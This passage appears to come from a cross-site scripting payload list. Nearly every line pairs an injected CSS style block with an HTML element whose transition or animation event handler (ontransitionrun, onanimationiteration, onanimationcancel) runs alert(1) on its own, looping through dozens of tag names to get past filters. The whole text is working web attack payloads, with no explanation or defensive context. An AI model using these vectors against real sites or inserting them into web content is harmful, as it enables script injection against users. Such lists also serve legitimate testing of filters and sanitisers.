rotate(180deg);}</style><optgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></optgroup> +<style>:target {transform: rotate(180deg);}</style><option id=x style="transition:transform 2s" ontransitionrun=alert(1)></option> +<style>:target {transform: rotate(180deg);}</style><output id=x style="transition:transform 2s" ontransitionrun=alert(1)></output> +<style>:target {transform: rotate(180deg);}</style><p id=x style="transition:transform 2s" ontransitionrun=alert(1)></p> +<style>:target {transform: rotate(180deg);}</style><param id=x style="transition:transform 2s" ontransitionrun=alert(1)></param> +<style>:target {transform: rotate(180deg);}</style><picture id=x style="transition:transform 2s" ontransitionrun=alert(1)></picture> +<style>:target {transform: rotate(180deg);}</style><plaintext id=x style="transition:transform 2s" ontransitionrun=alert(1)></plaintext> +<style>:target {transform: rotate(180deg);}</style><pre id=x style="transition:transform 2s" ontransitionrun=alert(1)></pre> +<style>:target {transform: rotate(180deg);}</style><progress id=x style="transition:transform 2s" ontransitionrun=alert(1)></progress> +<style>:target {transform: rotate(180deg);}</style><q id=x style="transition:transform 2s" ontransitionrun=alert(1)></q> +<style>:target {transform: rotate(180deg);}</style><rb id=x style="transition:transform 2s" ontransitionrun=alert(1)></rb> +<style>:target {transform: rotate(180deg);}</style><rp id=x style="transition:transform 2s" ontransitionrun=alert(1)></rp> +<style>:target {transform: rotate(180deg);}</style><rt id=x style="transition:transform 2s" ontransitionrun=alert(1)></rt> +<style>:target {transform: rotate(180deg);}</style><rtc id=x style="transition:transform 2s" ontransitionrun=alert(1)></rtc> +<style>:target {transform: rotate(180deg);}</style><ruby id=x style="transition:transform 2s" ontransitionrun=alert(1)></ruby> +<style>:target {transform: rotate(180deg);}</style><s id=x style="transition:transform 2s" ontransitionrun=alert(1)></s> +<style>:target {transform: rotate(180deg);}</style><samp id=x style="transition:transform 2s" ontransitionrun=alert(1)></samp> +<style>:target {transform: rotate(180deg);}</style><script id=x style="transition:transform 2s" ontransitionrun=alert(1)></script> +<style>:target {transform: rotate(180deg);}</style><section id=x style="transition:transform 2s" ontransitionrun=alert(1)></section> +<style>:target {transform: rotate(180deg);}</style><select id=x style="transition:transform 2s" ontransitionrun=alert(1)></select> +<style>:target {transform: rotate(180deg);}</style><shadow id=x style="transition:transform 2s" ontransitionrun=alert(1)></shadow> +<style>:target {transform: rotate(180deg);}</style><slot id=x style="transition:transform 2s" ontransitionrun=alert(1)></slot> +<style>:target {transform: rotate(180deg);}</style><small id=x style="transition:transform 2s" ontransitionrun=alert(1)></small> +<style>:target {transform: rotate(180deg);}</style><source id=x style="transition:transform 2s" ontransitionrun=alert(1)></source> +<style>:target {transform: rotate(180deg);}</style><spacer id=x style="transition:transform 2s" ontransitionrun=alert(1)></spacer> +<style>:target {transform: rotate(180deg);}</style><span id=x style="transition:transform 2s" ontransitionrun=alert(1)></span> +<style>:target {transform: rotate(180deg);}</style><strike id=x style="transition:transform 2s" ontransitionrun=alert(1)></strike> +<style>:target {transform: rotate(180deg);}</style><strong id=x style="transition:transform 2s" ontransitionrun=alert(1)></strong> +<style>:target {transform: rotate(180deg);}</style><style id=x style="transition:transform 2s" ontransitionrun=alert(1)></style> +<style>:target {transform: rotate(180deg);}</style><sub id=x style="transition:transform 2s" ontransitionrun=alert(1)></sub> +<style>:target {transform: rotate(180deg);}</style><summary id=x style="transition:transform 2s" ontransitionrun=alert(1)></summary> +<style>:target {transform: rotate(180deg);}</style><sup id=x style="transition:transform 2s" ontransitionrun=alert(1)></sup> +<style>:target {transform: rotate(180deg);}</style><svg id=x style="transition:transform 2s" ontransitionrun=alert(1)></svg> +<style>:target {transform: rotate(180deg);}</style><table id=x style="transition:transform 2s" ontransitionrun=alert(1)></table> +<style>:target {transform: rotate(180deg);}</style><tbody id=x style="transition:transform 2s" ontransitionrun=alert(1)></tbody> +<style>:target {transform: rotate(180deg);}</style><td id=x style="transition:transform 2s" ontransitionrun=alert(1)></td> +<style>:target {transform: rotate(180deg);}</style><template id=x style="transition:transform 2s" ontransitionrun=alert(1)></template> +<style>:target {transform: rotate(180deg);}</style><textarea id=x style="transition:transform 2s" ontransitionrun=alert(1)></textarea> +<style>:target {transform: rotate(180deg);}</style><tfoot id=x style="transition:transform 2s" ontransitionrun=alert(1)></tfoot> +<style>:target {transform: rotate(180deg);}</style><th id=x style="transition:transform 2s" ontransitionrun=alert(1)></th> +<style>:target {transform: rotate(180deg);}</style><thead id=x style="transition:transform 2s" ontransitionrun=alert(1)></thead> +<style>:target {transform: rotate(180deg);}</style><time id=x style="transition:transform 2s" ontransitionrun=alert(1)></time> +<style>:target {transform: rotate(180deg);}</style><title id=x style="transition:transform 2s" ontransitionrun=alert(1)></title> +<style>:target {transform: rotate(180deg);}</style><tr id=x style="transition:transform 2s" ontransitionrun=alert(1)></tr> +<style>:target {transform: rotate(180deg);}</style><track id=x style="transition:transform 2s" ontransitionrun=alert(1)></track> +<style>:target {transform: rotate(180deg);}</style><tt id=x style="transition:transform 2s" ontransitionrun=alert(1)></tt> +<style>:target {transform: rotate(180deg);}</style><u id=x style="transition:transform 2s" ontransitionrun=alert(1)></u> +<style>:target {transform: rotate(180deg);}</style><ul id=x style="transition:transform 2s" ontransitionrun=alert(1)></ul> +<style>:target {transform: rotate(180deg);}</style><var id=x style="transition:transform 2s" ontransitionrun=alert(1)></var> +<style>:target {transform: rotate(180deg);}</style><video id=x style="transition:transform 2s" ontransitionrun=alert(1)></video> +<style>:target {transform: rotate(180deg);}</style><wbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></wbr> +<style>:target {transform: rotate(180deg);}</style><xmp id=x style="transition:transform 2s" ontransitionrun=alert(1)></xmp> +<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 10s" ontransitioncancel=alert(1)></xss> +<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss> +<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a> +<style>@keyframes slidein {}</style><abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></abbr> +<style>@keyframes slidein {}</style><acronym style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></acronym> +<style>@keyframes slidein {}</style><address style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></address> +<style>@keyframes slidein {}</style><applet style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></applet> +<style>@keyframes slidein {}</style><area style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></area> +<style>@keyframes slidein {}</style><article style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></article> +<style>@keyframes slidein {}</style><aside style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></aside> +<style>@keyframes slidein {}</style><audio style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></audio> +<style>@keyframes slidein {}</style><b style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></b> +<style>@keyframes slidein {}</style><base style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></base> +<style>@keyframes slidein {}</style><basefont style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></basefont> +<style>@keyframes slidein {}</style><bdi style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdi> +<style>@keyframes slidein {}</style><bdo style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdo> +<style>@keyframes slidein {}</style><bgsound style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bgsound> +<style>@keyframes slidein {}</style><big style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></big> +<style>@keyframes slidein {}</style><blink style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blink> +<style>@keyframes slidein {}</style><blockquote style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blockquote> +<style>@keyframes slidein {}</style><body style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></body> +<style>@keyframes slidein {}</style><br style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></br> +<style>@keyframes slidein {}</style><button style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></button> +<style>@keyframes slidein {}</style><canvas style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></canvas> +<style>@keyframes slidein {}</style><caption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></caption> +<style>@keyframes slidein {}</style><center style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></center> +<style>@keyframes slidein {}</style><cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></cite> +<style>@keyframes slidein {}</style><code style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></code> +<style>@keyframes slidein {}</style><col style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></col> +<style>@keyframes slidein {}</style><colgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></colgroup> +<style>@keyframes slidein {}</style><command style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></command> +<style>@keyframes slidein {}</style><content style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></content> +<style>@keyframes slidein {}</style><data style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></data> +<style>@keyframes slidein {}</style><datalist style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></datalist> +<style>@keyframes slidein {}</style><dd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dd> +<style>@keyframes slidein {}</style><del style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></del> +<style>@keyframes slidein {}</style><details style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></details> +<style>@keyframes slidein {}</style><dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dfn> +<style>@keyframes slidein {}</style><dialog style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dialog> +<style>@keyframes slidein {}</style><dir style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dir> +<style>@keyframes slidein {}</style><div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></div> +<style>@keyframes slidein {}</style><dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dl> +<style>@keyframes slidein {}</style><dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dt> +<style>@keyframes slidein {}</style><element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></element> +<style>@keyframes slidein {}</style><em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></em> +<style>@keyframes slidein {}</style><embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></embed> +<style>@keyframes slidein {}</style><fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></fieldset> +<style>@keyframes slidein {}</style><figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figcaption> +<style>@keyframes slidein {}</style><figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figure> +<style>@keyframes slidein {}</style><font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></font> +<style>@keyframes slidein {}</style><footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></footer> +<style>@keyframes slidein {}</style><form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></form> +<style>@keyframes slidein {}</style><frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frame> +<style>@keyframes slidein {}</style><frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frameset> +<style>@keyframes slidein {}</style><h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></h1> +<style>@keyframes slidein {}</style><head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></head> +<style>@keyframes slidein {}</style><header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></header> +<style>@keyframes slidein {}</style><hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hgroup> +<style>@keyframes slidein {}</style><hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hr> +<style>@keyframes slidein {}</style><html style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></html> +<style>@keyframes slidein {}</style><i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></i> +<style>@keyframes slidein {}</style><iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></iframe> +<style>@keyframes slidein {}</style><image style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></image> +<style>@keyframes slidein {}</style><img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></img> +<style>@keyframes slidein {}</style><input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></input> +<style>@keyframes slidein {}</style><ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ins> +<style>@keyframes slidein {}</style><isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></isindex> +<style>@keyframes slidein {}</style><kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></kbd> +<style>@keyframes slidein {}</style><keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></keygen> +<style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></label> +<style>@keyframes slidein {}</style><legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></legend> +<style>@keyframes slidein {}</style><li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></li> +<style>@keyframes slidein {}</style><link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></link> +<style>@keyframes slidein {}</style><listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></listing> +<style>@keyframes slidein {}</style><main style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></main> +<style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map> +<style>@keyframes slidein {}</style><mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></mark> +<style>@keyframes slidein {}</style><marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></marquee> +<style>@keyframes slidein {}</style><menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menu> +<style>@keyframes slidein {}</style><menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menuitem> +<style>@keyframes slidein {}</style><meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meta> +<style>@keyframes slidein {}</style><meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meter> +<style>@keyframes slidein {}</style><multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></multicol> +<style>@keyframes slidein {}</style><nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nav> +<style>@keyframes slidein {}</style><nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nextid> +<style>@keyframes slidein {}</style><nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nobr> +<style>@keyframes slidein {}</style><noembed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noembed> +<style>@keyframes slidein {}</style><noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noframes> +<style>@keyframes slidein {}</style><noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noscript> +<style>@keyframes slidein {}</style><object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></object> +<style>@keyframes slidein {}</style><ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ol> +<style>@keyframes slidein {}</style><optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></optgroup> +<style>@keyframes slidein {}</style><option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></option> +<style>@keyframes slidein {}</style><output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></output> +<style>@keyframes slidein {}</style><p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></p> +<style>@keyframes slidein {}</style><param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param> +<style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture> +<style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext> +<style>@keyframes slidein {}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre> +<style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress> +<style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q> +<style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb> +<style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp> +<style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt> +<style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc> +<style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby> +<style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s> +<style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp> +<style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script> +<style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section> +<style>@keyframes slidein {}</style><select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select> +<style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow> +<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> +<style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small> +<style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source> +<style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer> +<style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span> +<style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike> +<style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> +<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> +<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> +<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> +<style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> +<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> +<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> +<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> +<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> +<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> +<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> +<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> +<style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> +<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> +<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> +<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> +<style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> +<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> +<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> +<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> +<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> +<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> +<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> +<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> +<style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> +<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" 